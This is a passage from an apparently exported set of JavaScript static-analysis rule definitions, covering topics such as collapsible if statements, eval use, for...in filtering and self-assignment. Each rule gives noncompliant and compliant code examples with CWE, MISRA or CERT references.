p(arg) { } };\nvar result;\ntry { } catch (args) { }\nfunction x(arg) { }\nfunction args() { }\nvar y = function fun() { };\nvar f = new Function(\"args\", \"return 17;\");\n\nfunction fun() {\n if (arguments.length == 0) {\n \/\/ do something\n }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:CollapsibleIfStatements","repo":"javascript","name":"Collapsible \"if\" statements should be merged","htmlDesc":"<p>Merging collapsible <code>if<\/code> statements increases the code's readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x != undefined) {\n if (x === 2) {\n \/\/ ...\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x != undefined && x === 2) {\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:ContinueStatement","repo":"javascript","name":"\"continue\" should not be used","htmlDesc":"<p><code>continue<\/code> is an unstructured control flow statement. It makes code less testable, less readable and less maintainable. Structured\ncontrol flow statements such as <code>if<\/code> should be used instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n for (i = 0; i < 10; i++) {\n if (i == 5) {\n continue; \/* Noncompliant *\/\n }\n alert(\"i = \" + i);\n }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n for (i = 0; i < 10; i++) {\n if (i != 5) { \/* Compliant *\/\n alert(\"i = \" + i);\n }\n }\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.5 - The continue statement shall not be used. <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:ElseIfWithoutElse","repo":"javascript","name":"\"if ... else if\" constructs should end with \"else\" clauses","htmlDesc":"<p>This rule applies whenever an <code>if<\/code> statement is followed by one or more <code>else if<\/code> statements; the final <code>else if<\/code>\nshould be followed by an <code>else<\/code> statement.<\/p>\n<p>The requirement for a final <code>else<\/code> statement is defensive programming.<\/p>\n<p>The <code>else<\/code> statement should either take appropriate action or contain a suitable comment as to why no action is taken. This is\nconsistent with the requirement to have a final <code>default<\/code> clause in a <code>switch<\/code> statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x == 0) {\n doSomething();\n} else if (x == 1) {\n doSomethingElse();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x == 0) {\n doSomething();\n} else if (x == 1) {\n doSomethingElse();\n} else {\n throw \"Unexpected value for x\";\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.10 - All if...else if constructs shall be terminated with an else clause. <\/li>\n <li> MISRA C++:2008, 6-4-2 - All if...else if constructs shall be terminated with an else clause. <\/li>\n <li> MISRA C:2012, 15.7 - All if...else if constructs shall be terminated with an else statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/PQHRAw\">CERT, MSC57-J.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:EqEqEq","repo":"javascript","name":"\"===\" and \"!==\" should be used instead of \"==\" and \"!=\"","htmlDesc":"<p>The <code>==<\/code> and <code>!=<\/code> operators do type coercion before comparing values. This is bad because it can mask type errors. For\nexample, it evaluates <code>' \\t\\r\\n' == 0<\/code> as <code>true<\/code>.<\/p>\n<p>It is best to always use the side-effect-less <code>===<\/code> and <code>!==<\/code> operators instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (var == 'howdy') {...} \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (var === 'howdy') {...}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Even if testing the equality of a variable against null doesn't do exactly what most JavaScript developers believe, usage of <code>==<\/code> or\n<code>!=<\/code> is tolerated in such context. In the following case, if <code>foo<\/code> hasn't been initialized, its default value is not\n<code>null<\/code> but <code>undefined<\/code>. Nevertheless <code>undefined == null<\/code>, so JavaScript developers get the expected behavior.<\/p>\n<pre>\nif(foo == null) {...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:Eval","repo":"javascript","name":"Code should not be dynamically injected and executed","htmlDesc":"<p>The <code>eval<\/code> function is a way to run arbitrary code at run-time. Dynamically evaluating code is slow and a potential security issue when\nthe arguments haven't been properly validated.<\/p>\n<p>In general it is better to avoid it altogether, particularly when there are safer alternatives.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar value = eval('obj.' + propName); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar value = obj[propName];\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule will not raise an issue when the argument of the <code>eval<\/code> call is a literal string as it is reasonably safe.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/95.html\">MITRE CWE-95<\/a> - CWE-95: Improper Neutralization of Directives in Dynamically\n Evaluated Code ('Eval Injection') <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:ExcessiveParameterList","repo":"javascript","name":"Functions should not have too many parameters","htmlDesc":"<p>A long parameter list can indicate that a new structure should be created to wrap the numerous parameters or that the function is doing too many\nthings.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a maximum number of 4 parameters:<\/p>\n<pre>\nfunction doSomething(param1, param2, param3, param4, param5) {\n...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(param1, param2, param3, param4) {\n...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"maximumFunctionParameters","htmlDesc":"The maximum authorized number of parameters","defaultValue":"7","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:ForIn","repo":"javascript","name":"\"for...in\" loops should filter properties before acting on them","htmlDesc":"<p>The <code>for...in<\/code> statement allows you to loop through the names of all of the properties of an object. The list of properties includes all\nthose properties that were inherited through the prototype chain. This has the side effect of serving up functions when the interest is in data\nproperties. Programs that don't take this into account can fail.<\/p>\n<p>Therefore, the body of every <code>for...in<\/code> statement should be wrapped in an <code>if<\/code> statement that filters which properties are\nacted upon. It can select for a particular type or range of values, or it can exclude functions, or it can exclude properties from the prototype. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (name in object) {\n doSomething(name); \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (name in object) {\n if (object.hasOwnProperty(name)) {\n doSomething(name);\n }\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Loops used to clone objects are ignored.<\/p>\n<pre>\nfor (prop in obj) {\n a[prop] = obj[prop]; \/\/ Compliant by exception\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:FunctionComplexity","repo":"javascript","name":"Functions should not be too complex","htmlDesc":"<p>The Cyclomatic Complexity of functions should not exceed a defined threshold. Complex code may perform poorly and can be difficult to test\nthoroughly.<\/p>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"maximumFunctionComplexityThreshold","htmlDesc":"The maximum authorized complexity in function","defaultValue":"10","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:FunctionDeclarationsWithinBlocks","repo":"javascript","name":"Function declarations should not be made within blocks","htmlDesc":"<p>While most script engines support function declarations within blocks, it is not part of ECMAScript 5 and below, and from browser to browser the\nimplementations are inconsistent with each other. ECMAScript 5 and below only allow function declarations in the root statement list of a script or\nfunction. If you are targeting browsers that don't support ECMAScript 6, use a variable initialized with a function expression to define a function\nwithin a block :<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x) {\n function foo() {}\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x) {\n var foo = function() {}\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:FutureReservedWords","repo":"javascript","name":"\"future reserved words\" should not be used as identifiers","htmlDesc":"<p>The following words may be used as keywords in future evolutions of the language, so using them as identifiers should be avoided to allow an easier\nadoption of those potential future versions:<\/p>\n<ul>\n <li> <code>await<\/code> <\/li>\n <li> <code>class<\/code> <\/li>\n <li> <code>const<\/code> <\/li>\n <li> <code>enum<\/code> <\/li>\n <li> <code>export<\/code> <\/li>\n <li> <code>extends<\/code> <\/li>\n <li> <code>implements<\/code> <\/li>\n <li> <code>import<\/code> <\/li>\n <li> <code>interface<\/code> <\/li>\n <li> <code>let<\/code> <\/li>\n <li> <code>package<\/code> <\/li>\n <li> <code>private<\/code> <\/li>\n <li> <code>protected<\/code> <\/li>\n <li> <code>public<\/code> <\/li>\n <li> <code>static<\/code> <\/li>\n <li> <code>super<\/code> <\/li>\n <li> <code>yield<\/code> <\/li>\n<\/ul>\n<p>Use of these words as identifiers would produce an error in JavaScript <code>strict<\/code> mode code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar package = document.getElementsByName(\"foo\"); \/\/ Noncompliant\nvar someData = { package: true }; \/\/ Compliant, as it is not used as an identifier here\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar elements = document.getElementsByName(\"foo\"); \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:LabelPlacement","repo":"javascript","name":"Only \"while\", \"do\" and \"for\" statements should be labelled","htmlDesc":"<p>Any statement or block of statements can be identified by a label, but those labels should be used only on <code>while<\/code>,\n<code>do-while<\/code> and <code>for<\/code> statements. Using labels in any other context leads to unstructured, confusing code. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nmyLabel:if (i % 2 == 0) { \/\/ Noncompliant\n if (i == 12) {\n print(\"12\");\n break myLabel;\n }\n print(\"Odd number, but not 12\");\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nmyLabel:for (i = 0; i < 10; i++) { \/\/ Compliant\n print(\"Loop\");\n break myLabel;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:NestedIfDepth","repo":"javascript","name":"Control flow statements \"if\", \"for\", \"while\", \"switch\" and \"try\" should not be nested too deeply","htmlDesc":"<p>Nested <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>switch<\/code>, and <code>try<\/code> statements is a key ingredient for making\nwhat's known as \"Spaghetti code\".<\/p>\n<p>Such code is hard to read, refactor and therefore maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\n if (condition1) { \/\/ Compliant - depth = 1\n \/* ... *\/\n if (condition2) { \/\/ Compliant - depth = 2\n \/* ... *\/\n for(int i = 0; i < 10; i++) { \/\/ Compliant - depth = 3, not exceeding the limit\n \/* ... *\/\n if (condition4) { \/\/ Non-Compliant - depth = 4\n if (condition5) { \/\/ Depth = 5, exceeding the limit, but issues are only reported on depth = 4\n \/* ... *\/\n }\n return;\n }\n }\n }\n }\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"maximumNestingLevel","htmlDesc":"Maximum allowed "if\/for\/while\/switch\/try" statements nesting depth","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:ParsingError","repo":"javascript","name":"JavaScript parser failure","htmlDesc":"<p>When the JavaScript parser fails, it is possible to record the failure as a violation on the file. This way, not only it is possible to track the\nnumber of files that do not parse but also to easily find out why they do not parse.<\/p>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:PrimitiveWrappers","repo":"javascript","name":"Wrapper objects should not be used for primitive types","htmlDesc":"<p>The use of wrapper objects for primitive types is gratuitous, confusing and dangerous. If you use a wrapper object constructor for type conversion,\njust remove the <code>new<\/code> keyword, and you'll get a primitive value automatically. If you use a wrapper object as a way to add properties to a\nprimitive, you should re-think the design. Such uses are considered bad practice, and should be refactored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nlet x = new Number(\"0\");\nif (x) {\n alert('hi'); \/\/ Shows 'hi'.\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nlet x = Number(\"0\");\nif (x) {\n alert('hi');\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Cases when argument of primitive type constructor is a literal of the same type are ignored, except <code>new Boolean(false)<\/code>.<\/p>\n<pre>\nlet booleanObject = new Boolean(true);\nlet numberObject = new Number(0);\nlet stringObject = new String('');\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1067","repo":"javascript","name":"Expressions should not be too complex","htmlDesc":"<p>The complexity of an expression is defined by the number of <code>&&<\/code>, <code>||<\/code> and <code>condition ? ifTrue : ifFalse<\/code>\noperators it contains.<\/p>\n<p>A single expression's complexity should not become too high to keep the code readable.<\/p>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"max","htmlDesc":"Maximum number of allowed conditional operators in an expression","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S1105","repo":"javascript","name":"An open curly brace should be located at the end of a line","htmlDesc":"<p>Sharing some coding conventions is a key point to make it possible for a team to efficiently collaborate. This rule makes it mandatory to place\nopen curly braces at the end of lines of code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition)\n{ \/\/Noncompliant\n doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition) { \/\/Compliant\n doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Object literals appearing as arguments can start on their own line.<\/p>\n<pre>\nfunctionWithObject(\n { \/\/Compliant\n g: \"someValue\"\n }\n);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1125","repo":"javascript","name":"Boolean literals should not be redundant","htmlDesc":"<p>Redundant Boolean literals should be removed from expressions to improve readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (booleanVariable == true) { \/* ... *\/ }\nif (booleanVariable != true) { \/* ... *\/ }\nif (booleanVariable || false) { \/* ... *\/ }\ndoSomething(!false);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (booleanVariable) { \/* ... *\/ }\nif (!booleanVariable) { \/* ... *\/ }\nif (booleanVariable) { \/* ... *\/ }\ndoSomething(true);\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The use of literal booleans in comparisons which use identity operators (<code>===<\/code> and <code>!==<\/code>) are ignored.<\/p>\n\n<h2>Deprecated<\/h2>\n<p>This rule is deprecated, and will eventually be removed.<\/p>","status":"DEPRECATED","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1134","repo":"javascript","name":"Track uses of \"FIXME\" tags","htmlDesc":"<p><code>FIXME<\/code> tags are commonly used to mark places where a bug is suspected, but which the developer wants to deal with later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide(numerator, denominator) {\n return numerator \/ denominator; \/\/ FIXME denominator value might be 0\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1135","repo":"javascript","name":"Track uses of \"TODO\" tags","htmlDesc":"<p><code>TODO<\/code> tags are commonly used to mark places where some more code is required, but which the developer wants to implement later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n \/\/ TODO\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1219","repo":"javascript","name":"\"switch\" statements should not contain non-case labels","htmlDesc":"<p>Even if it is legal, mixing case and non-case labels in the body of a switch statement is very confusing and can even be the result of a typing\nerror.<\/p>\n<h2>Noncompliant Code Examples<\/h2>\n<p>Case 1, the code is syntactically correct but the behavior is not the expected one<\/p>\n<pre>\nswitch (day) {\n case MONDAY:\n case TUESDAY:\n WEDNESDAY: \/\/ instead of \"case WEDNESDAY\"\n doSomething();\n break;\n ...\n}\n<\/pre>\n<p>Case 2, the code is correct and behaves as expected but is hardly readable <\/p>\n<pre>\nswitch (day) {\n case MONDAY:\n break;\n case TUESDAY:\n foo:for(i = 0 ; i < X ; i++) {\n \/* ... *\/\n break foo; \/\/ this break statement doesn't relate to the nesting case TUESDAY\n \/* ... *\/\n }\n break;\n \/* ... *\/\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<p>Case 1<\/p>\n<pre>\nswitch (day) {\n case MONDAY:\n case TUESDAY:\n case WEDNESDAY:\n doSomething();\n break;\n ...\n}\n<\/pre>\n<p>Case 2<\/p>\n<pre>\nswitch (day) {\n case MONDAY:\n break;\n case TUESDAY:\n compute(args); \/\/ put the content of the labelled \"for\" statement in a dedicated method\n break;\n\n \/* ... *\/\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1264","repo":"javascript","name":"A \"while\" loop should be used instead of a \"for\" loop","htmlDesc":"<p>When only the condition expression is defined in a <code>for<\/code> loop, and the initialization and increment expressions are missing, a\n<code>while<\/code> loop should be used instead to increase readability. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (;condition;) { \/*...*\/ }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nwhile (condition) { \/*...*\/ }\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1301","repo":"javascript","name":"\"switch\" statements should have at least 3 \"case\" clauses","htmlDesc":"<p><code>switch<\/code> statements are useful when there are many different cases depending on the value of the same expression.<\/p>\n<p>For just one or two cases however, the code will be more readable with <code>if<\/code> statements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (variable) {\n case 0:\n doSomething();\n break;\n default:\n doSomethingElse();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (variable == 0) {\n doSomething();\n} else {\n doSomethingElse();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.5 - Every switch statement shall have at least one case clause. <\/li>\n <li> MISRA C++:2008, 6-4-8 - Every switch statement shall have at least one case-clause. <\/li>\n <li> MISRA C:2012, 16.6 - Every switch statement shall have at least two switch-clauses <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S138","repo":"javascript","name":"Functions should not have too many lines","htmlDesc":"<p>A function that grows too large tends to aggregate too many responsibilities.<\/p>\n<p>Such functions inevitably become harder to understand and therefore harder to maintain. <\/p>\n<p>Above a specific threshold, it is strongly advised to refactor into smaller functions which focus on well-defined tasks.<\/p>\n<p>Those smaller functions will not only be easier to understand, but also probably easier to test.<\/p>\n<h2>Exceptions<\/h2>\n<p>This function ignores Immediately Invoked Function Expressions (IIFE), which are functions that are created and invoked without ever being assigned\na name.<\/p>\n<pre>\n(function () { \/\/ Ignored by this rule\n\n function open() { \/\/ Classic function declaration; not ignored\n \/\/ ...\n }\n\n function read() {\n \/\/ ...\n }\n\n function readlines() {\n \/\/ ...\n }\n})();\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"max","htmlDesc":"Maximum authorized lines in a function","defaultValue":"200","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S1442","repo":"javascript","name":"\"alert(...)\" should not be used","htmlDesc":"<p><code>alert(...)<\/code> can be useful for debugging during development, but in production mode this kind of pop-up could expose sensitive\ninformation to attackers, and should never be displayed. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(unexpectedCondition)\n{\n alert(\"Unexpected Condition\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489.html\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S1656","repo":"javascript","name":"Variables should not be self-assigned","htmlDesc":"<p>There is no reason to re-assign a variable to itself. Either this statement is redundant and should be removed, or the re-assignment is a mistake\nand some other value or variable was intended for the assignment instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction setName(name) {\n name = name;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction setName(name) {\n this.name = name;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S1871","repo":"javascript","name":"Two branches in a conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having two <code>cases<\/code> in a <code>switch<\/code> statement or two branches in an <code>if<\/code> chain with the same implementation is at\nbest duplicate code, and at worst a coding error. If the same logic is truly needed for both instances, then in an <code>if<\/code> chain they should\nbe combined, or for a <code>switch<\/code>, one should fall through to the other. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (i) {\n case 1:\n doFirstThing();\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n case 3: \/\/ Noncompliant; duplicates case 1's implementation\n doFirstThing();\n doSomething();\n break;\n default:\n doTheRest();\n}\n\nif (a >= 0 && a < 10) {\n doFirstThing();\n doTheThing();\n}\nelse if (a >= 10 && a < 20) {\n doTheOtherThing();\n}\nelse if (a >= 20 && a < 50) {\n doFirstThing();\n doTheThing(); \/\/ Noncompliant; duplicates first condition\n}\nelse {\n doTheRest();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch (i) {\n case 1:\n case 3:\n doFirstThing();\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n default:\n doTheRest();\n}\n\nif ((a >= 0 && a < 10) || (a >= 20 && a < 50)) {\n doFirstThing();\n doTheThing();\n}\nelse if (a >= 10 && a < 20) {\n doTheOtherThing();\n}\nelse {\n doTheRest();\n}\n<\/pre>\n<p>or <\/p>\n<pre>\nswitch (i) {\n case 1:\n doFirstThing();\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n case 3:\n doFirstThing();\n doThirdThing();\n break;\n default:\n doTheRest();\n}\n\nif (a >= 0 && a < 10) {\n doFirstThing();\n doTheThing();\n}\nelse if (a >= 10 && a < 20) {\n doTheOtherThing();\n}\nelse if (a >= 20 && a < 50) {\n doFirstThing();\n doTheThirdThing();\n}\nelse {\n doTheRest();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Blocks in an <code>if<\/code> chain that contain a single line of code are ignored, as are blocks in a <code>switch<\/code> statement that contain a\nsingle line of code with or without a following <code>break<\/code>.<\/p>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1994","repo":"javascript","name":"\"for\" loop increment clauses should modify the loops' counters","htmlDesc":"<p>It can be extremely confusing when a <code>for<\/code> loop's counter is incremented outside of its increment clause. In such cases, the increment\nshould be moved to the loop's increment clause if at all possible.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (i = 0; i < 10; j++) { \/\/ Noncompliant\n \/\/ ...\n i++;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (i = 0; i < 10; i++, j++) {\n \/\/ ...\n}\n<\/pre>\n<p>Or<\/p>\n<pre>\nfor (i = 0; i < 10; i++) {\n \/\/ ...\n j++;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2123","repo":"javascript","name":"Values should not be uselessly incremented","htmlDesc":"<p>A value that is incremented or decremented and then not stored is at best wasted code and at worst a bug.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar i = 0;\ni = i++; \/\/ Noncompliant; i is still zero\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar i = 0;\ni++;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2138","repo":"javascript","name":"\"undefined\" should not be assigned","htmlDesc":"<p><code>undefined<\/code> is the value you get for variables and properties which have not yet been created. Use the same value to reset an existing\nvariable and you lose the ability to distinguish between a variable that exists but has no value and a variable that does not yet exist. Instead,\n<code>null<\/code> should be used, allowing you to tell the difference between a property that has been reset and one that was never created.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myObject = {};\n\n\/\/ ...\nmyObject.fname = undefined; \/\/ Noncompliant\n\/\/ ...\n\nif (myObject.lname == undefined) {\n \/\/ property not yet created\n}\nif (myObject.fname == undefined) {\n \/\/ no real way of knowing the true state of myObject.fname\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar myObject = {};\n\n\/\/ ...\nmyObject.fname = null;\n\/\/ ...\n\nif (myObject.lname == undefined) {\n \/\/ property not yet created\n}\nif (myObject.fname == undefined) {\n \/\/ no real way of knowing the true state of myObject.fname\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2208","repo":"javascript","name":"Wildcard imports should not be used","htmlDesc":"<p>On the principle that clearer code is better code, you should explicitly <code>import<\/code> the things you want to use in a module. Using\n<code>import *<\/code> imports everything in the module, and runs the risk of confusing maintainers. Similarly, <code>export * from \"module\";<\/code>\nimports and then re-exports everything in the module, and runs the risk of confusing not just maintainers but also users of the module.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nimport * as Imported from \"aModule\"; \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2228","repo":"javascript","name":"Console logging should not be used","htmlDesc":"<p>Debug statements are always useful during development. But include them in production code - particularly in code that runs client-side - and you\nrun the risk of inadvertently exposing sensitive information, slowing down the browser, or even erroring-out the site for some users.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconsole.log(password_entered); \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A6-Sensitive_Data_Exposure\">OWASP Top Ten 2013 Category A6<\/a> - Sensitive Data Exposure\n <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2234","repo":"javascript","name":"Parameters should be passed in the correct order","htmlDesc":"<p>When the names of arguments in a function call match the names of the function parameters, it contributes to clearer, more readable code. However,\nwhen the names match, but are passed in a different order than the function parameters, it indicates a mistake in the parameter order which will\nlikely lead to unexpected results.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide(divisor, dividend) {\n return divisor\/dividend;\n}\n\nfunction doTheThing() {\n var divisor = 15;\n var dividend = 5;\n\n var result = divide(dividend, divisor); \/\/ Noncompliant; operation succeeds, but result is unexpected\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction divide(divisor, dividend) {\n return divisor\/dividend;\n}\n\nfunction doTheThing() {\n var divisor = 15;\n var dividend = 5;\n\n var result = divide(divisor, dividend);\n 